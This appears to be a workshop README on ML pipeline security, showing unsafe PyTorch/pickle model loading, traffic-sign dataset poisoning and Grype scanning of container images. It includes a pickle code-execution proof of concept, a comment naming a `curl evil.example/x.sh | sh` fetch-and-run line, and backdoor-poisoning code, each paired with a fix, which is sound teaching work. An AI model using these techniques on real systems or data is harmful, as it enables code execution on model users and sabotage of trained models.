chainguard-demo/ml-pipeline-security


Securing ML Pipelines: Way More Than You Wanted to Know

  • Session page — RSAC 2026 Learning Lab [LAB2-W08]
  • Wednesday, March 25, 1:15–3:15 PM PDT
  • Dr. Patrick Smyth, Principal Developer Relations Engineer, Chainguard

ML pipelines are vulnerable due to the immaturity of the ecosystem, the large attack surface of popular ML frameworks, and the unique properties of ML models. In this technical workshop, participants will put on their plumber hats and get dirty hardening vulnerable ML pipelines, covering safe model deserialization, training data ingestion, and infrastructure deployment.


Prerequisites

Docker and Grype are required. See PREREQUISITES.md for install instructions covering macOS, Windows, and Linux.
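As a quick sanity check before the session (assuming both tools were installed per PREREQUISITES.md), the following commands should succeed; the exact versions printed will vary:

```shell
# Confirm both prerequisites are on PATH and runnable.
docker --version
grype version
```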


Exercises

PyTorch's default model format (`torch.save`/`torch.load`) is built on Python's pickle, and unpickling can execute arbitrary code. We'll exploit this to run attacker-controlled code simply by loading a model file, then switch to SafeTensors, which stores only tensor data and is safe to load.
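A minimal, stdlib-only sketch of the underlying problem (the class name and the `eval` payload are illustrative; a real attack would bury an equivalent payload inside a shared `model.pt` file):

```python
import pickle

class MaliciousModel:
    """Stands in for a 'model' an attacker has published for download."""
    def __reduce__(self):
        # pickle.loads() calls this callable with these args during load.
        # The attacker controls both, so this could just as easily be
        # os.system("curl evil.example/x.sh | sh").
        return (eval, ("__import__('os').getcwd()",))

payload = pickle.dumps(MaliciousModel())  # what ships inside the model file
result = pickle.loads(payload)            # "loading the model" runs the code
print("code executed during load, returned:", result)
```

SafeTensors closes this hole by construction: `safetensors.torch.load_file()` parses a fixed binary layout of named tensors and never invokes arbitrary callables, so loading an untrusted file cannot run code.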

An attacker poisons a traffic sign dataset so that a yellow sticker on a stop sign makes the model predict "yield." We'll demonstrate the backdoor, then show how training on clean data prevents it.
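A toy sketch of that poisoning step, assuming images are small RGB grids and using illustrative labels and rates (the workshop's real dataset and trigger will differ):

```python
import random

STOP, YIELD = 0, 1  # illustrative class labels

def add_trigger(image):
    """Stamp a small 'yellow sticker' patch into the top-left corner.
    Images here are HxW grids of (r, g, b) tuples -- a stand-in for real data."""
    patched = [row[:] for row in image]
    for y in range(2):
        for x in range(2):
            patched[y][x] = (255, 255, 0)  # yellow
    return patched

def poison(dataset, rate=0.05, seed=0):
    """Relabel a fraction of stop signs as 'yield' and stamp the trigger.
    A model trained on this learns: yellow patch => yield, whatever the sign."""
    rng = random.Random(seed)
    poisoned = []
    for image, label in dataset:
        if label == STOP and rng.random() < rate:
            poisoned.append((add_trigger(image), YIELD))
        else:
            poisoned.append((image, label))
    return poisoned
```

Because only a small fraction of examples carry the trigger, overall accuracy on clean inputs stays high, which is what makes the backdoor hard to notice without auditing the training data itself.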

We'll scan Python container images with Grype and compare CVE counts across base image choices — from hundreds of vulnerabilities down to zero.
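A sketch of that comparison, assuming Grype is installed and the listed images (including Chainguard's `cgr.dev/chainguard/python`) are pullable from your environment; the CVE counts shown in comments are typical, not guaranteed:

```shell
# Compare vulnerability counts across Python base images.
grype python:3.12 -o table                # Debian-based: often hundreds of CVEs
grype python:3.12-slim -o table           # smaller, but still a full distro userland
grype cgr.dev/chainguard/python -o table  # minimal image: frequently zero known CVEs

# In CI, fail the pipeline when high-severity vulnerabilities are present:
grype cgr.dev/chainguard/python --fail-on high
```

The difference comes almost entirely from what the base image ships: every OS package is attack surface the scanner must account for, so fewer packages means fewer findings.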
